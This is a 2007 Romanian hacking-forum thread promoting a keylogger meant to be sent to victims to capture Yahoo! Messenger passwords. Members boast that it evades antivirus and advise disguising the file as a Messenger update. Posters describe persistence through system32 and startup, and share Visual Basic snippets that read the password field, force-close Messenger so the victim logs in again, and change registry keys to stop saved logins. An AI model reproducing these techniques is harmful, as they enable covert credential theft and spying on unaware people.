Nytro Posted October 8, 2007 Report Posted October 8, 2007 Un Keylogger foarte usor de folosit . Trimiti server victimei , intri in client , scri la Victim IP ip-ul victimei si dai Connect . E necesar ca vitima sa execute server si ca IP sa fie corect . Si daca Status este : Connected functioneaza . Ca sa incepi keyloggingul apesi Start Keylogging . O sa iti apara in client tot ce scrie victima . Si ai optiunea Close Y! Messenger . Click pe buton si o sa-i inchizi messu . Victima repede o sa intre pe mess ca nu poate sta 5 min fara mess ... si i-ai luat parola de la mess Screenshot :Latest version :Digital Keylogger v3.ohttp://rstcenter.com/forum/digital-keylogger-v3-0-by-nytro-t9876.rstEnjoy
Guest Nemessis Posted October 8, 2007 Report Posted October 8, 2007 Dragut. Nedetectabil cu Norton 2005. Sa vedem ce zic cei ce il testeaza si daca e gasit de vreun AV
Ras Posted October 8, 2007 Report Posted October 8, 2007 Imi place pt ca este simplu si poate sa il foloseasca oricine.L-am trimis unui amic care foloseste BitDefender(nu stiu ce versiune) si nu l-a gasit ca virus.Acum sa vedem cat timp se mentine FUD...Good job yonyx
grunter Posted October 8, 2007 Report Posted October 8, 2007 am trimis la vreo 3.....le-am bagat si ip-urile aflate cu netstat -n sau cu ip getter si la status acolo dadea error ..nu connected..
fibrytzo Posted October 8, 2007 Report Posted October 8, 2007 Sorry dar nu merge dak mergea aveai de la me 10x :?
katmai Posted October 8, 2007 Report Posted October 8, 2007 10x Mie imi merge,dati rename la server ca sa parca cat mai credibil cand trimiteti eu am trimis la vre-o 2 si a mes 1
Nytro Posted October 9, 2007 Author Report Posted October 9, 2007 programul merge lam testat pe 2 persoane si a mers ... Poate nu a mers din cauza :-nu e bun IP-victima nu a rulat server-server a fost blocat de firewallMS all ... o sa incep lucrul la Digital Keylogger Pro si o sal imbunatatesc putin ... incerc sa fac sa se conecteze automat la client , la rularea serverului ... da asta cred ca va merge decat pe un ip ...Nu o sa dau sursa da o sa va spun cate ceva despre cum functioneaza ...In server se afla un label care "retine" toate tastele apasate ... si la apasarea din client pe "Start ..." serverul trimite din secunda in secunda catre client acel label ... Daca puneam mai putin , mergea calc victimei greu ... Cam asta e baza ...Nu-l scanati pe virustotal pls
H4e Posted October 9, 2007 Report Posted October 9, 2007 yonyx e tar ekeylogger-ul l-am scanat cu nod 32 shi nik, o intrebare merge sa-l bindez cu o mel k shtiu k dak bindam unele keyloggere numai mergeau?????
grunter Posted October 9, 2007 Report Posted October 9, 2007 nu-l mai binda...trimite la victima spunandu-i ca e Y!amp9.0 la mn a mers de trimis dar nu a functionat..probabil au firewall oricum asteptam versiunea pro:) nytro
vladiii Posted October 9, 2007 Report Posted October 9, 2007 Banuiesc ca este nedetectabil pentru ca nu ai scris functia de adaugare a programului la StartUp (scriere in registrii, care este detectata de majoritatea antivirusilor). Pe langa asta, sper ca ti-ai dat seama ca faza cu "Close Y! M" nu este prea utila, pentru ca majoritatea oamenilor au optiunea Remember my ID & Password activata... Eee, bun ! Sa iti spun cum ai putea sa faci sa "capturezi" cumva parola aceea, chiar daca are optiunea aia activata. Ori scrii un DLL care il injectezi in procesul Yahoo! Messengerului, ori injectezi direct cod. Ce cod ? Un cod care subclaseaza butonul &Sign In (pentru asta ii gasesti handleul cu FindWindow si FindWindowEx) si verifica daca primeste mesaje de gen: WM_COMMAND (din cate stiu eu, trimiterea acestui mesaj are loc cand este apasat respectivul buton). Folosind functia WindowProc (CallBack), daca parametrul uMsg este WM_COMMAND, atunci gasesti handleul TextBoxului in care se introduce parola si preiei acest text folosind APIul GetWindowText (tine minte, al 2-lea parametru este un buffer). Apoi trimiti mesajul inapoi la buton folosind CallWindowProc .Sper ca am fost destul de explicit (thnx lui Shocker pentru explicarea unor nelamuriri).In rest, este un keylogger ca oricare altul. Oricum, good job !
Ras Posted October 9, 2007 Report Posted October 9, 2007 Banuiesc ca este nedetectabil pentru ca nu ai scris functia de adaugare a programului la StartUp (scriere in registrii, care este detectata de majoritatea antivirusilor). Pe langa asta, sper ca ti-ai dat seama ca faza cu "Close Y! M" nu este prea utila, pentru ca majoritatea oamenilor au optiunea Remember my ID & Password activata... Eee, bun ! Sa iti spun cum ai putea sa faci sa "capturezi" cumva parola aceea, chiar daca are optiunea aia activata. Ori scrii un DLL care il injectezi in procesul Yahoo! Messengerului, ori injectezi direct cod. Ce cod ? Un cod care subclaseaza butonul &Sign In (pentru asta ii gasesti handleul cu FindWindow si FindWindowEx) si verifica daca primeste mesaje de gen: WM_COMMAND (din cate stiu eu, trimiterea acestui mesaj are loc cand este apasat respectivul buton). Folosind functia WindowProc (CallBack), daca parametrul uMsg este WM_COMMAND, atunci gasesti handleul TextBoxului in care se introduce parola si preiei acest text folosind APIul GetWindowText (tine minte, al 2-lea parametru este un buffer). Apoi trimiti mesajul inapoi la buton folosind CallWindowProc .Sper ca am fost destul de explicit (thnx lui Shocker pentru explicarea unor nelamuriri).In rest, este un keylogger ca oricare altul. Oricum, good job !are functia de adaugare la startup!
Nytro Posted October 9, 2007 Author Report Posted October 9, 2007 se adauga la start up . da antivirusii gaseau ca virus : Filecopy AppPath ... codu de copiere al fisierului in system32 ... yo am facut o arhiva SFX in care am pus si mswinsck si care copiaza server si mswinsck in system32 si ruleaza dupa copiere serverul . Si cu close yahoo messenger ... nu cred ca am scris bne comanda si nush daca inchide messu DAR : cred ca merge : o sa ii inchida messu : victima intra pe mess si scrie id si parola si normal idu si parola le "prinde" keyloggerul si le trimite in client , deci o sa primesti pe tava parola foarte simplu
vladiii Posted October 9, 2007 Report Posted October 9, 2007 Ok. Ca sa inchizi Y! M folosesti:din hwnd as longhwnd=FindWindow("YahooBuddyMain", vbnullstring)Apoi trimiti la hwnd un mesaj, si anume WM_CLOSE, folosind APIul PostMessage sau SendMessage.Cat despre parola/id la messenger, ai citit ce am scris mai sus ?
Guest Nemessis Posted October 9, 2007 Report Posted October 9, 2007 vladiii avansezi. Bravo. Tine-o tot asa.
vladiii Posted October 10, 2007 Report Posted October 10, 2007 vladiii avansezi. Bravo. Tine-o tot asa.Hmm... Esti ironic ?
Nytro Posted October 10, 2007 Author Report Posted October 10, 2007 merge optiunea close messenger pe care am puso yo ... si ce ai explicat tu ... nu prea re rost sa ma complic ... si dc "YahooBuddyMain" ? dc nu Yahoo! Messenger ? si daca ii inchid messu , victima o sa intre imediat pe mess , o sa scrie id-ul si parola si o sa le primesc in keylogger . foarte simplu ...
vladiii Posted October 10, 2007 Report Posted October 10, 2007 YahooBuddyMain pentru ca asta este clasa ferestrei messengerului !Si nu cred ca te complici, pentru ca majoritatea au optiunea Remember my ID & Password activata, si tu nu mai ai ce parola sa capturezi pt. ca el nu o scrie ! Greu e de inteles !
Nytro Posted October 10, 2007 Author Report Posted October 10, 2007 da , ai dreptate fac un fake messenger
Guest Nemessis Posted October 10, 2007 Report Posted October 10, 2007 vladiii avansezi. Bravo. Tine-o tot asa.Hmm... Esti ironic ? nope
Nytro Posted October 10, 2007 Author Report Posted October 10, 2007 pai as putea sa etez erverul sa "captureze" doar textele scrise pe messenger ... cu FindWindow ... iar de optiunea cu remember id and password scap usor cu o modificare in registry
vladiii Posted October 10, 2007 Report Posted October 10, 2007 Cum sa preiei parola din textbox (thnx SlicK pentru ajutor):Dim a as long, b as long, c as long, d as longDim pass as stringpass=Space$(256)a=FindWindow("YahooBuddyMain",vbnullstring)b=FindWindowEx(a, vbnullstring, "#32770", vbnullstring)c=FindWindowEx(b, vbnullstring, "Edit", vbnullstring)d=FindWindowEx(b, c, "Edit", vbnullstring)GetWindowText d,pass,256Si in legatura cu ce ai spus sus, astept cod ca-s curios.
Nytro Posted October 11, 2007 Author Report Posted October 11, 2007 pai cod ca sa "captureze" doar ce e scris pe messenger cu FindWindow , daca returneaza o valoare nula nu pornesc keylogger ( in cazul digital keylogger , folosesc un timer , deci daca returneaza o valoare nula nu dau enable la timer si porneste keylogger . iar daca nu returneaza o valoare nula , nu dau enable la timer , deci keyloggerul nu e pornit ... ca sa zic asa iar cu remember id and password e foarte usor :Curent user / software / yahoo / pager / save password : 0 ca sa nu fie remember , si 1 ca sa fie remember Curent user / software / yahoo / pager / auto login : 0 ca sa nu se logheze automat , si 1 ca sa e logheze automat ( adika la 0 apesi enter ca sa te loghezi )Curent user / software / yahoo / pager / yahoo! user id >> idul care se logheaza automatCurent user / software / yahoo / pager / launch on startup >> daca e logheaza automat la startup